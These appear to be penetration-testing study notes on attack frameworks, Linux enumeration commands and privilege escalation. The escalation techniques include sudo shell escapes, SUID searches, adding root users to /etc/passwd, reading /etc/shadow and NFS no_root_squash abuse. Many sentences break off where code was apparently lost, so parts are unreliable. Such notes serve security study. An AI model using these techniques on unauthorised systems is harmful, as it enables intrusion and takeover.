Backdoors & Breaches
An “attack framework” is just a way to describe an attack in a standardized fashion.
The diamond model can be summarized as, “for every intrusion, there exists an adversary who is using their capabilities over/with some kind of infrastructure infrastructure to attack a victim.”
MITRE ATT&CK is really the gold standard though.
Useful Linux post-exploit enumeration commands
ps auxww(lots and lots of process info)
ps auxfww(process tree)
sudo -l(create log enteries!)
netstat -a(all listening parts and established connections)
netstat -l(only listening ports)
netstat -s(protocol statistics)
netstat -p(protocol and service information, requires root to see everything)
netstat -i(per interface statistics)
j can be used with
ps to get a slightly different column output format. This is mostly useful for finding out numeric user IDs and parent process IDs.
netstat command supports the
-u flags to limit returned ports to TCP and UDP, respectively. Note that by default
netstat will try to resolve hostnames, which can cause hangs; use
-n to skip this (and only display IP addresses).
Of these, only LES is available in the Kali Linux repos (
sudo apt install linux-exploit-suggester).
Sometimes, you can also get applications to leak information about sensitive files (such as
/etc/shadow by passing these as if they were configuration files. Apache is one app that does this.
reset; sh 1>&0 2>&0
sudo less is as simple as
find can be run with
sudo, then try
sudo find . -exec /bin/sh \; -quit.
Find (not always so quickly) SUID and SGID files:
find / -type f -perm -04000 -ls 2>/dev/null
Note that Linux systems still fall back to password hashes in
/etc/passwd if an entry in
/etc/shadow isn’t present. This means that we can just directly add root-equivalent users directly here (remember that the UID and primary GID can be duplicated!).
To generate a password acceptable for inclusion in
openssl passwd -1 -salt $SALT $PASSWORD
“Capabilities” are finer-grained permissions that can be assigned to a binary. Think of them as a kind of granular SUID/SGID.
getcap command displays a binary’s capabilities (if there are any), and can even be used to perform a search for such binaries using
getcap -r $PATH 2> /dev/null.
Basically, check to see if any scripts run by a privileged user can be written to by an unprivileged user.
Also look for “zombie” cron jobs that are still running but refer to a non-existent file in a writable location.
Bash as a reverse proxy makes an appearance again here.
NFS exports are listed in
/etc/exports; if an export is configured with
no_root_squash, then root permissions won’t be stripped from created files and it’s possible to create root-owned SUID/SGID binaries on the mount. (Remember that files on NFS mounts are created using the UID/GID values of the local user!)